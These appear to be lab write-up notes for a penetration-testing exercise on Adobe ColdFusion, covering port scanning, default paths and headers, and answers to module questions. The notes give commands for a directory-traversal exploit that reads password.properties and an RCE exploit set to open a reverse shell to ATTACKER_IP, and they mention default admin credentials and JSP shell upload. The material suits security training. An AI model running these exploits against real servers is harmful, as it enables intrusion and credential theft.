🎯 Objective: Identify ColdFusion applications, enumerate version information, and discover default files and directories for further exploitation.
ColdFusion is a Java-based web application development platform using CFML (ColdFusion Markup Language). Commonly found in enterprise environments with specific file extensions (.cfm, .cfc) and default directories.
Question: "What ColdFusion protocol runs on port 5500?"
| Port | Protocol | Description |
|---|---|---|
| 80 | HTTP | Non-secure web communication |
| 443 | HTTPS | Secure web communication |
| 1935 | RPC | Remote Procedure Call |
| 25 | SMTP | Email communication |
| 8500 | SSL | Server communication via SSL |
| 5500 | Server Monitor | Remote administration |
Answer: Server Monitor
# Nmap service detection
nmap -p- -sC -Pn TARGET --open
# Look for common ColdFusion ports
# 8500/tcp open fmtp (ColdFusion SSL port).cfm- ColdFusion Markup pages.cfc- ColdFusion Components
# Common ColdFusion paths
/CFIDE/
/cfdocs/
/CFIDE/administrator/
/CFIDE/administrator/index.cfm# Response headers indicating ColdFusion
Server: ColdFusion
X-Powered-By: ColdFusion- ColdFusion-specific error pages
- CFML tag references in errors
- Stack traces mentioning ColdFusion
# Navigate to ColdFusion installation
http://TARGET:8500/
# Common findings:
# /CFIDE/ - Administrator interface
# /cfdocs/ - Documentation# Administrator login page
http://TARGET:8500/CFIDE/administrator/
# Look for version in:
# - Login page footer
# - Error messages
# - Default files# Common ColdFusion files
Application.cfm
index.cfm
admin.cfm
install.cfmPositive Identification:
- 🔍 Port 8500 open (SSL/administrator)
- 📁 CFIDE directory accessible
- 📄
.cfmextensions in responses - 🏷️ ColdFusion headers in HTTP responses
⚠️ CF error messages with CFML references
Attack Surfaces:
- Administrator interface - Authentication bypass
- Default credentials - admin:admin, blank passwords
- File upload capabilities
- Directory traversal vulnerabilities
- RCE via CFML code execution
Question: "What user is ColdFusion running as?"
# Download directory traversal exploit
searchsploit -m multiple/remote/14641.py
# Extract password.properties file
python2 14641.py TARGET 8500 "../../../../../../../../ColdFusion8/lib/password.properties"
# Result: Retrieves encrypted passwords and config data# Download RCE exploit
searchsploit -m cfm/webapps/50057.py
# Modify exploit variables:
# lhost = 'ATTACKER_IP' # Your VPN IP
# lport = 4444 # Listener port
# rhost = 'TARGET_IP' # Target IP
# rport = 8500 # Target port
# Execute exploit for reverse shell
python3 50057.py
# In reverse shell, check user context
whoamiAnswer: arctic\tolis
- Vulnerable files:
/CFIDE/administrator/settings/mappings.cfm - Method: Manipulate
localeparameter with../sequences - Target: Extract
password.propertiesand config files
- Vulnerable path:
/CFIDE/scripts/ajax/FCKeditor/ - Method: File upload via FCKeditor functionality
- Impact: JSP shell upload → full system compromise
# Search for ColdFusion exploits
searchsploit adobe coldfusion
# Key exploits:
# 14641.py - Directory Traversal
# 50057.py - Unauthenticated RCE
# 27755.txt - Admin Authentication Bypass💡 Pro Tip: ColdFusion installations often have default credentials or weak authentication on the administrator interface - always check /CFIDE/administrator/ for access opportunities.